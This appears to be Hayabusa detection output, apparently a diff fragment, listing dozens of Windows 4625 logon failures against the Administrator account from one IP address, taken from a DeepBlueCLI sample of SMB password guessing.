+2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PAZ83Onp00vURKSz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BxvywmA4UMI04zm2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1vH6DSer71gxEDRc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uDNQibannB453BKc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 02qkYtCIrOj38agd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: atDwGfxC4RLYYDAF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fCTUmKwLxkKCoCTn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DBE7Y8yJMNSkJlaK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N7VGVfH05BC7bgaZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lP7kC2ayRIEeL5sw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2cQOn41cB2t0ZkSP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PpOyXZwlcCw63tWP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7R8yD7A0lCU16Z0t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: frasd7f8On0O7B6k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FtOqqV6rkCIZPPFG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lnwn4dc1lKABRKxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CiUnLFzfXR6rER9B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u1InESrL0ebaRw2z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IlLAG8gXt9YNeW4H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uZIWubLvZcDOWHxr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FZazp7ZnBrtswAse  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jqK5Vqf0QF4qtg0A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k3JvFwi9gDNbO6Sj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fBubAOTZMsahNG0Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KCxrXG3N1IRzDxxM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e2h9M7o0lS7oC00a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pprfGGVZblL64xC3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wxgzMKd7eDwzs8WO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q2RljqAhn0NZhR6O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rcxQVtjMqnE1wGfr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fSRggYsSiJGsGSyV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yQqfSKOyKLSILPrQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k7oAI2q6YCu8btlK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KniVwndqE9aC6cIM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FgQbvpfuS11matJi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R9TwJS4B9ZaDD2Ze  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IPUuoopOnwlTjlTP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9VEyOUuiOi8Q3JBJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pGGGazMTBBfrppDZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NKO4V35Y2qPEB59W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WxVdhpR7ZnAluurU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gZjAZb9bQKZjwL8u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aKyLX5ChpgBuFEbr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 49t2xJvH2yHcyHle  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sg9Z6Pyix2UkMolr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0NN2olYn97ZoYCja  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S98j54bDGsz0k6g9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XxFEw9s0nnEQGzUN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wSswFHFSlqcQd47k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7icutlVIWSLZJszQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DSwyugYn0n3i5f25  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RmBaLCUcR7TmixTy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1oOBz2NQSCdTwa7V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O4tU1LPF5DRW9Vm0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SRsSNqPYruWBzp2n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3JZhBLzt4af1VtCU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dFLZIKSDBvBaWq59  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: guAG4ZTFMjZAxp1A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yd04xsSIdiczICeG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cx3i1URKPhC6KWI7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Npc6IS27HsWP3JA9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KIBnr0eZ1bHHGokW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6gTTrUVjpPU80LlC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FZlmUbCNAJga24JH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zf3aSGBMe97VujaH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8bx7ZM77aDG7y6Lh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BnHHAClMwyqA3TTI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 00ibRrYvnFt5w9X0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VglTKbnLVFvHZHzQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3NwX0sDFwHQG7Tkq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3mMx3M1zurKMBzyj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sH7b8P0O0uea3PlN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
